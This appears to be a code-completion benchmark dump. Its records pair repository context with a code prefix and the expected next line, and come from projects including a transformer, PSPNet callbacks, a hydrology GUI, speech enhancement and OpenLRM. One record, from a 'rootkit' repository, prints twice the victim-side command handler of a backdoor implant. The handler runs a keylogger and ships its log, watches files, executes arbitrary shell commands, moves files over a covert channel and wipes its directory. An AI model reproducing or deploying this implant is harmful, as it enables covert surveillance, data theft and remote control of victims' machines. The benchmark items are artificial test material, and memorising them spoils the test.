attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
)
|
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
) | self.decoder = Decoder( | 0 | 2023-12-18 20:01:00+00:00 | 4k |
YashsviG/rootkit | victim.py | [
{
"identifier": "port_knocking",
"path": "portknocker.py",
"snippet": "def port_knocking(victim_ip):\n \"\"\"\n Perform port knocking on the victim side to authenticate the commander.\n\n Args:\n victim_ip (str): IP address of the victim.\n\n Returns:\n tuple: IP address and po... | import argparse
import setproctitle
import shutil
from keylogger import *
from watcher import *
from portknocker import port_knocking
from processname import choose_process_name
from utils import get_ip_address, transfer_keylog_file, check_exists
| 2,122 | covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
|
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
i = check_exists(file)
if not i or watcher.get_status():
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
| proc_name = choose_process_name()
| 1 | 2023-12-19 18:54:22+00:00 | 4k |
SunHan0426/tree_location | pspnet/utils/callbacks.py | [
{
"identifier": "cvtColor",
"path": "pspnet/utils/utils.py",
"snippet": "def cvtColor(image):\r\n if len(np.shape(image)) == 3 and np.shape(image)[-2] == 3:\r\n return image \r\n else:\r\n image = image.convert('RGB')\r\n return image \r"
},
{
"identifier": "preprocess... | import os
import matplotlib
import torch
import torch.nn.functional as F
import scipy.signal
import cv2
import shutil
import numpy as np
from matplotlib import pyplot as plt
from PIL import Image
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from .utils import cvtColor, preprocess_input, resize_image
from .utils_metrics import compute_mIoU
| 1,702 |
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
|
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
| image_data = np.expand_dims(np.transpose(preprocess_input(np.array(image_data, np.float32)), (2, 0, 1)), 0)
| 1 | 2023-12-14 13:24:53+00:00 | 4k |
yacinxx/dnakey | create_profile.py | [
{
"identifier": "PrimeKeyConfig",
"path": "prime_key_config.py",
"snippet": "class PrimeKeyConfig:\r\n def agent_prime_key(self, hash_key:str) -> str | int:\r\n MAX_LENGTH = 56\r\n self.hash_key = hash_key\r\n if (self.hash_key) and (len(self.hash_key) == MAX_LENGTH) and (self.ha... | import streamlit as st
import pandas as pd
import time
import enginev2
from prime_key_config import PrimeKeyConfig
from profile_config.config_manager import ConfigManager
| 1,720 |
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
|
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
| self.config_manager = ConfigManager(self.config_has_key)
| 1 | 2023-12-18 22:04:13+00:00 | 4k |
tamnva/hydroecolstm | hydroecolstm/interface/project_summary_frame.py | [
{
"identifier": "config_to_text",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def config_to_text(config):\n out_text = []\n for key in config.keys(): \n # Write list object in multiple lines \n if type(config[key]) is list:\n out_text.append(key ... | import customtkinter as ctk
import tkinter as tk
import torch
from CTkToolTip import CTkToolTip
from CTkMessagebox import CTkMessagebox
from pathlib import Path
from hydroecolstm.interface.utility import config_to_text, sort_key
from hydroecolstm.interface.utility import write_yml_file | 2,027 |
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end")
|
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end") | output_text = config_to_text(config=sort_key(self.config)) | 1 | 2023-12-20 09:11:36+00:00 | 4k |
ContigoAI/tf1-phase-aware-speech-enhancement | code/main.py | [
{
"identifier": "Flags",
"path": "code/config.py",
"snippet": "class Flags():\n def __init__(self):\n # Model Training\n self.LoadSavedModel = True # Flag indicating whether to load a saved model\n\n # Model Parameters\n self.channels = 16384 # Number of channels\n ... | from .config import Flags
from .utils import audio_generator_complex, config_dataset, get_graph_size, get_wav_files
from .loss import weighted_sdr_loss
from .network import make_asppunet_3D
import tensorflow as tf
import datetime
import sklearn
import os
import time
import numpy as np
import scipy
import random | 3,338 |
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory
|
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory | checkpoint_dir = os.path.join(flags.ckdir, str(get_graph_size())[:3] + '_' + str(time.time())) | 3 | 2023-12-20 19:58:18+00:00 | 4k |
camenduru/OpenLRM-hf | lrm/models/generator.py | [
{
"identifier": "DinoWrapper",
"path": "lrm/models/encoders/dino_wrapper.py",
"snippet": "class DinoWrapper(nn.Module):\n \"\"\"\n Dino v1 wrapper using huggingface transformer implementation.\n \"\"\"\n def __init__(self, model_name: str, freeze: bool = True):\n super().__init__()\n ... | import torch.nn as nn
from .encoders.dino_wrapper import DinoWrapper
from .transformer import TriplaneTransformer
from .rendering.synthesizer import TriplaneSynthesizer | 3,305 | # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
)
| # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
